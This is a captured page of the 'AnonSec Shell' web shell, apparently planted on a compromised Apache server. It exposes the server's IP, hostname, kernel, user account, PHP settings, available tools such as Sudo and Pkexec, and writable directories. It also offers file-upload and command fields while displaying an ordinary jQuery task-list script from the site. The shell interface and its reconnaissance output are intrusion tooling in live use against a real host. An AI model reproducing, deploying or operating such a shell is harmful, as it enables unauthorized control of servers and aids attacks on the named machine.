AnonSec Shell
Server IP : 162.214.74.102  /  Your IP : 216.73.216.192
Web Server : Apache
System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64
User : lrsys ( 1015)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/lrsys/www/lrsys_apps/leo/application/plugins/module_imobles/assets/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/lrsys/www/lrsys_apps/leo/application/plugins/module_imobles/assets/js/task-list.js
$(document).ready(function ()
{
    var _url = $("#_url").val();


    $('#module_imobles_task_category_id').select2({
        theme: "bootstrap",
        placeholder: _L['Select'],
        ajax: {
            url: $("#_url").val() + 'module_imobles/ajax/task_category',
            dataType: "json",
            delay: 250,
            method: "POST",
            data: function (params) {
                var queryParameters = {
                    term: params.term,
                    type: returnFields('#type')
                };
                return queryParameters;
            },
            processResults: function (data) {
                return {
                    results: $.map(data, function (item) {
                        return {
                            text: item.text,
                            id: item.id
                        }
                    })
                };
            },
            cache: true,
        }
    });


    var _msg_add_new_task = $("#_msg_add_new_task").val();
    var _msg_task_name = $("#_msg_task_name").val();
    var _msg_edit = $("#_msg_edit").val();
    var _msg_ok = $("#_msg_ok").val();
    var _msg_cancel = $("#_msg_cancel").val();

    // Clear
    $('#filter-clear').on('click', function (event) {
        event.preventDefault();
        $("#type").val('');
        $("#module_imobles_task_category_id").val('');
        $('#form-filter').submit();
    });


    $('#type').on('change', function (event) {
        event.preventDefault();
        $("#module_imobles_task_category_id").val('');
        $('#form-filter').submit();
    });

    $('#module_imobles_task_category_id').on('change', function (event) {
        event.preventDefault();
        $('#form-filter').submit();
    });

});

Anon7 - 2022
AnonSec Team